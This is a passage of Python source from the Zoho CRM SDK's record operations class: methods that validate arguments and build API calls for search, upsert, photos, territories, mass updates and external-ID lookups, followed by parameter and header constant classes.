raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/upsert'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_ACTION)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def get_deleted_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to get deleted records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/deleted'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.deleted_records_handler import DeletedRecordsHandler
except Exception:
from .deleted_records_handler import DeletedRecordsHandler
return handler_instance.api_call(DeletedRecordsHandler.__module__, 'application/json')
def search_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to search records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/search'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def convert_lead(self, id, request):
"""
The method to convert lead
Parameters:
id (int) : An int representing the id
request (ConvertBodyWrapper) : An instance of ConvertBodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.convert_body_wrapper import ConvertBodyWrapper
except Exception:
from .convert_body_wrapper import ConvertBodyWrapper
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if request is not None and not isinstance(request, ConvertBodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: ConvertBodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/Leads/'
api_path = api_path + str(id)
api_path = api_path + '/actions/convert'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_CREATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
Utility.get_fields("Deals", handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.convert_action_handler import ConvertActionHandler
except Exception:
from .convert_action_handler import ConvertActionHandler
return handler_instance.api_call(ConvertActionHandler.__module__, 'application/json')
def get_photo(self, id, module_api_name):
"""
The method to get photo
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/photo'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.download_handler import DownloadHandler
except Exception:
from .download_handler import DownloadHandler
return handler_instance.api_call(DownloadHandler.__module__, 'application/x-download')
def upload_photo(self, id, module_api_name, request):
"""
The method to upload photo
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
request (FileBodyWrapper) : An instance of FileBodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.file_body_wrapper import FileBodyWrapper
except Exception:
from .file_body_wrapper import FileBodyWrapper
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, FileBodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: FileBodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/photo'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_CREATE)
handler_instance.set_content_type('multipart/form-data')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
Utility.get_fields(module_api_name, handler_instance)
Utility.verify_photo_support(module_api_name)
try:
from zcrmsdk.src.com.zoho.crm.api.record.file_handler import FileHandler
except Exception:
from .file_handler import FileHandler
return handler_instance.api_call(FileHandler.__module__, 'application/json')
def delete_photo(self, id, module_api_name):
"""
The method to delete photo
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/photo'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.file_handler import FileHandler
except Exception:
from .file_handler import FileHandler
return handler_instance.api_call(FileHandler.__module__, 'application/json')
def mass_update_records(self, module_api_name, request):
"""
The method to mass update records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (MassUpdateBodyWrapper) : An instance of MassUpdateBodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.mass_update_body_wrapper import MassUpdateBodyWrapper
except Exception:
from .mass_update_body_wrapper import MassUpdateBodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, MassUpdateBodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: MassUpdateBodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/mass_update'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.mass_update_action_handler import MassUpdateActionHandler
except Exception:
from .mass_update_action_handler import MassUpdateActionHandler
return handler_instance.api_call(MassUpdateActionHandler.__module__, 'application/json')
def get_mass_update_status(self, module_api_name, param_instance=None):
"""
The method to get mass update status
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/mass_update'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.mass_update_response_handler import MassUpdateResponseHandler
except Exception:
from .mass_update_response_handler import MassUpdateResponseHandler
return handler_instance.api_call(MassUpdateResponseHandler.__module__, 'application/json')
def assign_territories_to_multiple_records(self, module_api_name, request):
"""
The method to assign territories to multiple records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/actions/assign_territories'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_mandatory_checker(True)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def assign_territory_to_record(self, module_api_name, id, request):
"""
The method to assign territory to record
Parameters:
module_api_name (string) : A string representing the module_api_name
id (int) : An int representing the id
request (BodyWrapper) : An instance of BodyWrapper
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
api_path = api_path + '/actions/assign_territories'
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def remove_territories_from_multiple_records(self, module_api_name, request):
    """
    The method to remove territories from multiple records

    Parameters:
        module_api_name (string) : A string representing the module_api_name
        request (BodyWrapper) : An instance of BodyWrapper

    Returns:
        APIResponse: An instance of APIResponse

    Raises:
        SDKException
    """
    # Lazy import with a relative-path fallback, matching the SDK's pattern.
    try:
        from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
    except Exception:
        from .body_wrapper import BodyWrapper

    # Argument validation before building the request.
    if not isinstance(module_api_name, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
    if request is not None and not isinstance(request, BodyWrapper):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)

    handler_instance = CommonAPIHandler()
    # POST /crm/v2.1/{module}/actions/remove_territories
    handler_instance.set_api_path('/crm/v2.1/' + str(module_api_name) + '/actions/remove_territories')
    handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
    handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
    handler_instance.set_content_type('application/json')
    handler_instance.set_request(request)
    # Bulk variant enforces mandatory-field checking on the request body.
    handler_instance.set_mandatory_checker(True)
    handler_instance.set_module_api_name(module_api_name)
    Utility.get_fields(module_api_name, handler_instance)

    try:
        from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
    except Exception:
        from .action_handler import ActionHandler
    return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def remove_territories_from_record(self, module_api_name, id, request):
    """
    The method to remove territories from record

    Parameters:
        module_api_name (string) : A string representing the module_api_name
        id (int) : An int representing the id
        request (BodyWrapper) : An instance of BodyWrapper

    Returns:
        APIResponse: An instance of APIResponse

    Raises:
        SDKException
    """
    # Lazy import with a relative-path fallback, matching the SDK's pattern.
    try:
        from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
    except Exception:
        from .body_wrapper import BodyWrapper

    # Argument validation before building the request.
    if not isinstance(module_api_name, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
    if not isinstance(id, int):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
    if request is not None and not isinstance(request, BodyWrapper):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)

    handler_instance = CommonAPIHandler()
    # POST /crm/v2.1/{module}/{id}/actions/remove_territories
    handler_instance.set_api_path('/crm/v2.1/' + str(module_api_name) + '/' + str(id) + '/actions/remove_territories')
    handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
    handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
    handler_instance.set_content_type('application/json')
    handler_instance.set_request(request)
    handler_instance.set_module_api_name(module_api_name)
    Utility.get_fields(module_api_name, handler_instance)

    try:
        from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
    except Exception:
        from .action_handler import ActionHandler
    return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def record_count(self, module_api_name, param_instance=None):
    """
    The method to record count

    Parameters:
        module_api_name (string) : A string representing the module_api_name
        param_instance (ParameterMap) : An instance of ParameterMap

    Returns:
        APIResponse: An instance of APIResponse

    Raises:
        SDKException
    """
    # Argument validation before building the request.
    if not isinstance(module_api_name, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
    if param_instance is not None and not isinstance(param_instance, ParameterMap):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)

    handler_instance = CommonAPIHandler()
    # GET /crm/v2.1/{module}/actions/count
    handler_instance.set_api_path('/crm/v2.1/' + str(module_api_name) + '/actions/count')
    handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
    handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
    handler_instance.set_param(param_instance)

    try:
        from zcrmsdk.src.com.zoho.crm.api.record.count_handler import CountHandler
    except Exception:
        from .count_handler import CountHandler
    return handler_instance.api_call(CountHandler.__module__, 'application/json')
def get_record_using_external_id(self, external_field_value, module_api_name, param_instance=None, header_instance=None):
    """
    The method to get record using external id

    Parameters:
        external_field_value (string) : A string representing the external_field_value
        module_api_name (string) : A string representing the module_api_name
        param_instance (ParameterMap) : An instance of ParameterMap
        header_instance (HeaderMap) : An instance of HeaderMap

    Returns:
        APIResponse: An instance of APIResponse

    Raises:
        SDKException
    """
    # Argument validation before building the request.
    if not isinstance(external_field_value, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: external_field_value EXPECTED TYPE: str', None, None)
    if not isinstance(module_api_name, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
    if param_instance is not None and not isinstance(param_instance, ParameterMap):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
    if header_instance is not None and not isinstance(header_instance, HeaderMap):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)

    handler_instance = CommonAPIHandler()
    # GET /crm/v2.1/{module}/{external_field_value}
    handler_instance.set_api_path('/crm/v2.1/' + str(module_api_name) + '/' + str(external_field_value))
    handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
    handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
    handler_instance.set_param(param_instance)
    handler_instance.set_header(header_instance)
    handler_instance.set_module_api_name(module_api_name)
    Utility.get_fields(module_api_name, handler_instance)

    try:
        from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
    except Exception:
        from .response_handler import ResponseHandler
    return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def update_record_using_external_id(self, external_field_value, module_api_name, request, header_instance=None):
    """
    The method to update record using external id

    Parameters:
        external_field_value (string) : A string representing the external_field_value
        module_api_name (string) : A string representing the module_api_name
        request (BodyWrapper) : An instance of BodyWrapper
        header_instance (HeaderMap) : An instance of HeaderMap

    Returns:
        APIResponse: An instance of APIResponse

    Raises:
        SDKException
    """
    # Lazy import with a relative-path fallback, matching the SDK's pattern.
    try:
        from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
    except Exception:
        from .body_wrapper import BodyWrapper

    # Argument validation before building the request.
    if not isinstance(external_field_value, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: external_field_value EXPECTED TYPE: str', None, None)
    if not isinstance(module_api_name, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
    if request is not None and not isinstance(request, BodyWrapper):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
    if header_instance is not None and not isinstance(header_instance, HeaderMap):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)

    handler_instance = CommonAPIHandler()
    # PUT /crm/v2.1/{module}/{external_field_value}
    handler_instance.set_api_path('/crm/v2.1/' + str(module_api_name) + '/' + str(external_field_value))
    handler_instance.set_http_method(Constants.REQUEST_METHOD_PUT)
    handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
    handler_instance.set_content_type('application/json')
    handler_instance.set_request(request)
    handler_instance.set_header(header_instance)
    handler_instance.set_module_api_name(module_api_name)
    Utility.get_fields(module_api_name, handler_instance)

    try:
        from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
    except Exception:
        from .action_handler import ActionHandler
    return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def delete_record_using_external_id(self, external_field_value, module_api_name, param_instance=None, header_instance=None):
    """
    The method to delete record using external id

    Parameters:
        external_field_value (string) : A string representing the external_field_value
        module_api_name (string) : A string representing the module_api_name
        param_instance (ParameterMap) : An instance of ParameterMap
        header_instance (HeaderMap) : An instance of HeaderMap

    Returns:
        APIResponse: An instance of APIResponse

    Raises:
        SDKException
    """
    # Argument validation before building the request.
    if not isinstance(external_field_value, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: external_field_value EXPECTED TYPE: str', None, None)
    if not isinstance(module_api_name, str):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
    if param_instance is not None and not isinstance(param_instance, ParameterMap):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
    if header_instance is not None and not isinstance(header_instance, HeaderMap):
        raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)

    handler_instance = CommonAPIHandler()
    # DELETE /crm/v2.1/{module}/{external_field_value}
    handler_instance.set_api_path('/crm/v2.1/' + str(module_api_name) + '/' + str(external_field_value))
    handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
    # Bug fix: the original passed Constants.REQUEST_METHOD_DELETE (an HTTP
    # method constant) to set_category_method, while every sibling method in
    # this class uses a REQUEST_CATEGORY_* constant. Delete calls are
    # categorised as ACTION in this SDK. TODO(review): confirm against the
    # non-external delete_record implementation in this file.
    handler_instance.set_category_method(Constants.REQUEST_CATEGORY_ACTION)
    handler_instance.set_param(param_instance)
    handler_instance.set_header(header_instance)
    Utility.get_fields(module_api_name, handler_instance)

    try:
        from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
    except Exception:
        from .action_handler import ActionHandler
    return handler_instance.api_call(ActionHandler.__module__, 'application/json')
class GetRecordParam(object):
    """Param key constants for the get-record request (used with ParameterMap)."""
    approved = Param('approved', 'com.zoho.crm.api.Record.GetRecordParam')
    converted = Param('converted', 'com.zoho.crm.api.Record.GetRecordParam')
    cvid = Param('cvid', 'com.zoho.crm.api.Record.GetRecordParam')
    uid = Param('uid', 'com.zoho.crm.api.Record.GetRecordParam')
    fields = Param('fields', 'com.zoho.crm.api.Record.GetRecordParam')
    startdatetime = Param('startDateTime', 'com.zoho.crm.api.Record.GetRecordParam')
    enddatetime = Param('endDateTime', 'com.zoho.crm.api.Record.GetRecordParam')
    territory_id = Param('territory_id', 'com.zoho.crm.api.Record.GetRecordParam')
    include_child = Param('include_child', 'com.zoho.crm.api.Record.GetRecordParam')


class GetRecordHeader(object):
    """Header key constants for the get-record request (used with HeaderMap)."""
    if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetRecordHeader')
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.GetRecordHeader')


class UpdateRecordHeader(object):
    """Header key constants for the update-record request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpdateRecordHeader')


class DeleteRecordParam(object):
    """Param key constants for the delete-record request."""
    wf_trigger = Param('wf_trigger', 'com.zoho.crm.api.Record.DeleteRecordParam')


class DeleteRecordHeader(object):
    """Header key constants for the delete-record request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.DeleteRecordHeader')
class GetRecordsParam(object):
    """Param key constants for the get-records (list) request."""
    approved = Param('approved', 'com.zoho.crm.api.Record.GetRecordsParam')
    converted = Param('converted', 'com.zoho.crm.api.Record.GetRecordsParam')
    cvid = Param('cvid', 'com.zoho.crm.api.Record.GetRecordsParam')
    ids = Param('ids', 'com.zoho.crm.api.Record.GetRecordsParam')
    uid = Param('uid', 'com.zoho.crm.api.Record.GetRecordsParam')
    fields = Param('fields', 'com.zoho.crm.api.Record.GetRecordsParam')
    sort_by = Param('sort_by', 'com.zoho.crm.api.Record.GetRecordsParam')
    sort_order = Param('sort_order', 'com.zoho.crm.api.Record.GetRecordsParam')
    page = Param('page', 'com.zoho.crm.api.Record.GetRecordsParam')
    per_page = Param('per_page', 'com.zoho.crm.api.Record.GetRecordsParam')
    startdatetime = Param('startDateTime', 'com.zoho.crm.api.Record.GetRecordsParam')
    enddatetime = Param('endDateTime', 'com.zoho.crm.api.Record.GetRecordsParam')
    territory_id = Param('territory_id', 'com.zoho.crm.api.Record.GetRecordsParam')
    include_child = Param('include_child', 'com.zoho.crm.api.Record.GetRecordsParam')


class GetRecordsHeader(object):
    """Header key constants for the get-records (list) request."""
    if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetRecordsHeader')
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.GetRecordsHeader')


class CreateRecordsHeader(object):
    """Header key constants for the create-records request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.CreateRecordsHeader')


class UpdateRecordsHeader(object):
    """Header key constants for the update-records request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpdateRecordsHeader')


class DeleteRecordsParam(object):
    """Param key constants for the delete-records request."""
    ids = Param('ids', 'com.zoho.crm.api.Record.DeleteRecordsParam')
    wf_trigger = Param('wf_trigger', 'com.zoho.crm.api.Record.DeleteRecordsParam')


class DeleteRecordsHeader(object):
    """Header key constants for the delete-records request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.DeleteRecordsHeader')


class UpsertRecordsHeader(object):
    """Header key constants for the upsert-records request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.UpsertRecordsHeader')


class GetDeletedRecordsParam(object):
    """Param key constants for the get-deleted-records request."""
    type = Param('type', 'com.zoho.crm.api.Record.GetDeletedRecordsParam')
    page = Param('page', 'com.zoho.crm.api.Record.GetDeletedRecordsParam')
    per_page = Param('per_page', 'com.zoho.crm.api.Record.GetDeletedRecordsParam')


class GetDeletedRecordsHeader(object):
    """Header key constants for the get-deleted-records request."""
    if_modified_since = Header('If-Modified-Since', 'com.zoho.crm.api.Record.GetDeletedRecordsHeader')
class SearchRecordsParam(object):
    """Param key constants for the search-records request."""
    criteria = Param('criteria', 'com.zoho.crm.api.Record.SearchRecordsParam')
    email = Param('email', 'com.zoho.crm.api.Record.SearchRecordsParam')
    phone = Param('phone', 'com.zoho.crm.api.Record.SearchRecordsParam')
    word = Param('word', 'com.zoho.crm.api.Record.SearchRecordsParam')
    converted = Param('converted', 'com.zoho.crm.api.Record.SearchRecordsParam')
    approved = Param('approved', 'com.zoho.crm.api.Record.SearchRecordsParam')
    page = Param('page', 'com.zoho.crm.api.Record.SearchRecordsParam')
    per_page = Param('per_page', 'com.zoho.crm.api.Record.SearchRecordsParam')
    fields = Param('fields', 'com.zoho.crm.api.Record.SearchRecordsParam')


class SearchRecordsHeader(object):
    """Header key constants for the search-records request."""
    x_external = Header('X-EXTERNAL', 'com.zoho.crm.api.Record.SearchRecordsHeader')


class GetMassUpdateStatusParam(object):
    """Param key constants for the get-mass-update-status request."""
    job_id = Param('job_id', 'com.zoho.crm.api.Record.GetMassUpdateStatusParam')


class RecordCountParam(object):
    """Param key constants for the record-count request."""
    criteria = Param('criteria', 'com.zoho.crm.api.Record.RecordCountParam')
    email = Param('email', 'com.zoho.crm.api.Record.RecordCountParam')
    phone = Param('phone', 'com.zoho.crm.api.Record.RecordCountParam')
    word = Param('word', 'com.zoho.crm.api.Record.RecordCountParam')


class GetRecordUsingExternalIDParam(object):
    """Param key constants for the get-record-using-external-id request."""
